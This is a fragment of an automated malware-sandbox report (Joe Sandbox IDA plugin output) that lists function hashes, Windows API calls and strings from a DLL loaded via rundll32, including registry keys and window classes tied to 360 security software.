                                                                                                  • Opcode ID: fcf2df2db5cf5e266654a243a60d583c694b8e2f7e43b235741d210c56c3b519
                                                                                                  • Instruction ID: d4c98c1f2c6f443ab10be6318f00d39910fcbf62874244d53b77e7d0f65f3854
                                                                                                  • Opcode Fuzzy Hash: fcf2df2db5cf5e266654a243a60d583c694b8e2f7e43b235741d210c56c3b519
                                                                                                  • Instruction Fuzzy Hash: E651BE72715A4886EB92CF39D8803DD7760F789BE8F449211FA69177A9CF39C64AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: strchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 2830005266-178107231
                                                                                                  • Opcode ID: bc05744aff8b0383f5567bccd8194249036b1c2b3c5ae3525c55af492ab48238
                                                                                                  • Instruction ID: 65c5a2eb1091ab38a88c8a4afef7a6f5d28e655ba382c7d64d3166a1cd56c67f
                                                                                                  • Opcode Fuzzy Hash: bc05744aff8b0383f5567bccd8194249036b1c2b3c5ae3525c55af492ab48238
                                                                                                  • Instruction Fuzzy Hash: E741C33174568C80FFB78F2594483EA6791A75DFE8F5AD620E96E037C6DE2C864AC301
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValuewcsstr
                                                                                                  • String ID: "%s" %s$/elevated
                                                                                                  • API String ID: 1248106594-1382985213
                                                                                                  • Opcode ID: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
                                                                                                  • Instruction ID: f3329ece6a2879d43efc8f52936060a6c90d44f89bf07b9cf1bbe3f09b4200fa
                                                                                                  • Opcode Fuzzy Hash: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
                                                                                                  • Instruction Fuzzy Hash: E241A432702B4489EB95CF65D8407DC33A5FB88BD4F15861AAE5E53BA4DF34C659C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 000000018006A424: RegOpenKeyExW.ADVAPI32(?,?,?,?,00000000,0000000180068993,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A44B
                                                                                                  • memset.MSVCRT ref: 00000001800689A4
                                                                                                    • Part of subcall function 000000018006A490: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,00000001800689D0,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A4A9
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: OpenQueryValuememset
                                                                                                  • String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
                                                                                                  • API String ID: 733315865-1479031278
                                                                                                  • Opcode ID: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
                                                                                                  • Instruction ID: ca32e24e8d646fa6672ed224415891838e44a9bb2fa0ab3c5403e0472a1cb0df
                                                                                                  • Opcode Fuzzy Hash: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
                                                                                                  • Instruction Fuzzy Hash: DA411972B00B149AFB92DBA5D8447DD73B5BB487C8F148A16AE6853B58EF34C708CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@memset$??3@memmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 1691405456-0
                                                                                                  • Opcode ID: 898b7f6a28002f066823eb5036c047e985fc53dc141f5cbb7a005687aa805986
                                                                                                  • Instruction ID: 4c03d6f838081a40abf5c4ade735ff692b1a288c63e34611b63fa987e6e302c4
                                                                                                  • Opcode Fuzzy Hash: 898b7f6a28002f066823eb5036c047e985fc53dc141f5cbb7a005687aa805986
                                                                                                  • Instruction Fuzzy Hash: C7419F72311B9C81EA95CB65E5483AC73A5E748BE0F25C726AA7D07BD5DF38C289C310
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$CleanupEnterErrorInstallLastLeaveNameSpaceStartupmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3860525367-0
                                                                                                  • Opcode ID: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
                                                                                                  • Instruction ID: 37d746e663b56e28a6a3e394405e8b675d481f719bc3bdb0db42ce8d24bf20fd
                                                                                                  • Opcode Fuzzy Hash: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
                                                                                                  • Instruction Fuzzy Hash: 57316E31700A4886F6A29F25EC443E973A0FB8DBD5F548531B96A972A1DF39C7898700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalSectionTick$CloseEnterLeaveOpenQueryValue
                                                                                                  • String ID: dfsu11yy38277*(*6fhjsdkfds
                                                                                                  • API String ID: 4271658480-2650022146
                                                                                                  • Opcode ID: 0bb96f617ef2d1086e71c411e54c36657af4b2cd300dcf6be980ec3523e171b7
                                                                                                  • Instruction ID: dce0af6b373f41b2cde99525f258e7f40e176b48fd2bd51a90361080345aed67
                                                                                                  • Opcode Fuzzy Hash: 0bb96f617ef2d1086e71c411e54c36657af4b2cd300dcf6be980ec3523e171b7
                                                                                                  • Instruction Fuzzy Hash: 1DE19932200A0896EB92DB65E8443DD67A1F78DBD8F908125FE9D4B7A5DF38C789C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$AppendEnterFileModuleNamePathmemset$??2@CloseHandleLeaveOpenProcess_wcsicmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1628498879-0
                                                                                                  • Opcode ID: c55fa3f1590a76b51b5719240098a001aea9683c9cdf89b49a24cf48f6b8042e
                                                                                                  • Instruction ID: 97b4a975282553c66a0ecb0666d5844a1919ec74819ec340ad2c10574fb99984
                                                                                                  • Opcode Fuzzy Hash: c55fa3f1590a76b51b5719240098a001aea9683c9cdf89b49a24cf48f6b8042e
                                                                                                  • Instruction Fuzzy Hash: C531AF71708A8881FBA2DF15E8543D673A1BBCD7C8F808025AA4947A95EF3DC709CB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Size$CloseCreateHandleRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1601809017-0
                                                                                                  • Opcode ID: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
                                                                                                  • Instruction ID: 513f97a3dac13d024bc23301dce07c49bc5a225dcf8c593d0dc48b4e525c804c
                                                                                                  • Opcode Fuzzy Hash: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
                                                                                                  • Instruction Fuzzy Hash: 2E21803260475487E7819F2AE8443997BA1F788FD0F658225EF6547BA4DF38C64ACB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSectionfree$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2088343094-0
                                                                                                  • Opcode ID: 5fbffbf8c2ffbaa84898e67539130a2069622187be2ddd364023f9f6dbb26b90
                                                                                                  • Instruction ID: 6eb304321519da1f53f45f1cff4b3a54b1501cb2ad61fff334524383177ac9c5
                                                                                                  • Opcode Fuzzy Hash: 5fbffbf8c2ffbaa84898e67539130a2069622187be2ddd364023f9f6dbb26b90
                                                                                                  • Instruction Fuzzy Hash: 9021A932B05A4482EB45CF65E49039D73A0F79CFC8F158011EA5E4B666CF38C65A8310
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1980634866-0
                                                                                                  • Opcode ID: f467f76a96eb9053b169918f2e1298c6cb4ef450960c952188422ab546d25163
                                                                                                  • Instruction ID: 02bb1c2e578d024aba7b1d294f23a26f9da54a41464e923504772a2296b722cf
                                                                                                  • Opcode Fuzzy Hash: f467f76a96eb9053b169918f2e1298c6cb4ef450960c952188422ab546d25163
                                                                                                  • Instruction Fuzzy Hash: 8E119E3470160ED1F7DAEB259C553E522A1BF9C782F64C01AF52B850A0EE28C74DC720
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$??3@
                                                                                                  • String ID: Catalog_Entries$Num_Catalog_Entries
                                                                                                  • API String ID: 1245774677-781996053
                                                                                                  • Opcode ID: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
                                                                                                  • Instruction ID: 9fcea3ce77e1ed4f5330bab62f44b4aa9bf918aefdaa2edac95f8aa4354510da
                                                                                                  • Opcode Fuzzy Hash: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
                                                                                                  • Instruction Fuzzy Hash: E6C14132205F8481DAA1CF15F98039EB3A4F789BE4F598625EAED47B98CF38C155C744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@
                                                                                                  • String ID: Catalog_Entries$Num_Catalog_Entries
                                                                                                  • API String ID: 1936579350-781996053
                                                                                                  • Opcode ID: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
                                                                                                  • Instruction ID: d1be57a1d71c98b0b77dd863bddb056ffd98aca7a61043883bc55f1bcd24f70e
                                                                                                  • Opcode Fuzzy Hash: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
                                                                                                  • Instruction Fuzzy Hash: 46A1CB72B01F5882EA55DF25D98439C33A4E708BF8F1A8315EA68477E4EF34C69AC345
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Attributes$ExistsPath
                                                                                                  • String ID: ::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
                                                                                                  • API String ID: 3549565335-3700740638
                                                                                                  • Opcode ID: 1d0149c3f34552431bf59eb05347ec82fd401dfd2121ae44e8b2f54ac132c7fd
                                                                                                  • Instruction ID: 308d89a456878f58a443b3b63cbf74fe77f883dd4a59461d8164aca204eacb87
                                                                                                  • Opcode Fuzzy Hash: 1d0149c3f34552431bf59eb05347ec82fd401dfd2121ae44e8b2f54ac132c7fd
                                                                                                  • Instruction Fuzzy Hash: 8A915072700A489AEB95DF69C8403DD3361FB49BE4F408316EB6997AD5EF74CA59C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: \\?\$gfffffff
                                                                                                  • API String ID: 0-1566866656
                                                                                                  • Opcode ID: 92c2592203f147be486619f79412db35de23b2268a86ed145f873b14229e44a7
                                                                                                  • Instruction ID: bfc90c4694c0de5ac08ccb904688b68cff8c4fcbe65cd7113e56e150174f4709
                                                                                                  • Opcode Fuzzy Hash: 92c2592203f147be486619f79412db35de23b2268a86ed145f873b14229e44a7
                                                                                                  • Instruction Fuzzy Hash: 0C81C232700B488AEBA29B25E8403DE3360F789BE5F548315EEAA477D5DF78C649C704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004048F
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404A5
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404DD
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040553
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040569
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800405A1
                                                                                                  • Sleep.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004061C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$Enter$Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 950586405-0
                                                                                                  • Opcode ID: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
                                                                                                  • Instruction ID: e5e3152c6d786b815c8bb063f8079f541e8d353448f2aaa10215c0b82b1e43f2
                                                                                                  • Opcode Fuzzy Hash: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
                                                                                                  • Instruction Fuzzy Hash: E8618C31301A4892FAD69B21EC943DA23A4F78DBE9F66C515ED6A572A1CF38C74DC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValue
                                                                                                  • String ID: 360scan
                                                                                                  • API String ID: 1818849710-2450673717
                                                                                                  • Opcode ID: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
                                                                                                  • Instruction ID: 36ede12e68d324247f48980037de7b94a87db2de9e86c0014956a12bc0703eb2
                                                                                                  • Opcode Fuzzy Hash: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
                                                                                                  • Instruction Fuzzy Hash: 4341B132714B9885F7928B75D8503DC2B70BB8CBE8F549215EEA953BA5DF78C24AC300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ?terminate@@ExceptionThrow__crt_fast_encode_pointermalloc
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 760693298-1018135373
                                                                                                  • Opcode ID: 39eb716e9be1fb63b9110d3c5425ec3b5de1197dc277d27b79cf19f29df3a86f
                                                                                                  • Instruction ID: 259617d04e03f410bbb53384dcf33072f4c9910d22c17cce453464633d750d07
                                                                                                  • Opcode Fuzzy Hash: 39eb716e9be1fb63b9110d3c5425ec3b5de1197dc277d27b79cf19f29df3a86f
                                                                                                  • Instruction Fuzzy Hash: CB41DD72310B4886DBA29F25E8807ADB3A2F748BC8F208016FB5D43B56CF38DA55C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressDispatcherErrorExceptionLastProcSleepUser
                                                                                                  • String ID: InitOnceExecuteOnce
                                                                                                  • API String ID: 1145120385-4081768745
                                                                                                  • Opcode ID: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
                                                                                                  • Instruction ID: d97429db02a29b97f0d7b061f75759de830bcf77ba77d21ec7224c84f46128ac
                                                                                                  • Opcode Fuzzy Hash: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
                                                                                                  • Instruction Fuzzy Hash: 4331C63131175881FBDA8B65AC103A92294BB4DBE4F44C225FE6A9B7D4DF3DCA4A8300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCreateHandleModuleProc
                                                                                                  • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                  • API String ID: 1964897782-2994018265
                                                                                                  • Opcode ID: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
                                                                                                  • Instruction ID: ad22b3d90bad73cc844585d5212e8c39d9a41fcfaef769d6902fd1eabb8e997b
                                                                                                  • Opcode Fuzzy Hash: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
                                                                                                  • Instruction Fuzzy Hash: 77210C32619B8482EBA1CB55F8547AAB7A0F7C8BD4F149115EACD07B68CF7CC248CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AppendFileModuleNamePathmemset
                                                                                                  • String ID: ..\Config\cloudcfg.dat$cloudcfg.dat
                                                                                                  • API String ID: 1620117007-2349577946
                                                                                                  • Opcode ID: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
                                                                                                  • Instruction ID: ddd92409ecb0ccec80f2ab3f904b9d803dc2e3fbc70a3a57e8900bd834cf0119
                                                                                                  • Opcode Fuzzy Hash: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
                                                                                                  • Instruction Fuzzy Hash: DD216F71204A8881EA91DB11E8443DE7360F78ABD9F90C211FA9947AE9DF7DC74DCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseFileFindHandleMessageSendTimeoutUnmapViewWindow
                                                                                                  • String ID: Q360SafeMonClass
                                                                                                  • API String ID: 2549143951-79629921
                                                                                                  • Opcode ID: 5a6744058e53387468be0c2847b6ad283791736524b672027be404a340c54278
                                                                                                  • Instruction ID: c32431e1a2230fb89d0ac82bf3fb31adf9d80d138a3069ac5e7463625b7e75da
                                                                                                  • Opcode Fuzzy Hash: 5a6744058e53387468be0c2847b6ad283791736524b672027be404a340c54278
                                                                                                  • Instruction Fuzzy Hash: 7F012C36608B4883EB918F15F95479AB7A1F388BC4F454229EA4943B68DF3CD248CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: AddressCountHandleModuleProcTick
                                                                                                  • String ID: GetTickCount64$kernel32
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$??3@EnterLeave
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
